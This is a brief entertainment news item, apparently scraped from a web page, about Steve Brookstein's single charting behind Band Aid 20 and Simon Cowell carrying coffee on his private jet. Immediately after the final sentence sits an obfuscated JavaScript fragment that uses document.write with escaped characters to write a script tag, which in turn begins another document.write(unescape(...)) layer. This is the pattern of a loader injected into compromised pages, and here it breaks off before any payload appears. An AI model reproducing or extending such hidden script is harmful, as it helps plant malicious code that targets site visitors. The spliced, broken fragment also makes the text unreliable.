The X Factor winner Steve Brookstein is set to enter the charts at No 2 next week.
His single Against All Odds has sold more than 38,000 copies and is only being beaten by the Band Aid 20 song.
A spokesperson for HMV told the Daily Mirror: "If it wasn't for Band Aid, Steve would certainly be at number one as he is outselling the rest of the top ten put together."
Meanwhile, his manager Simon Cowell is flying off to Barbados for his Christmas break with a bit of extra baggage - two cases of coffee.
The paper says he has had two seats removed from his private jet so he can accommodate his favourite brand of beans.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
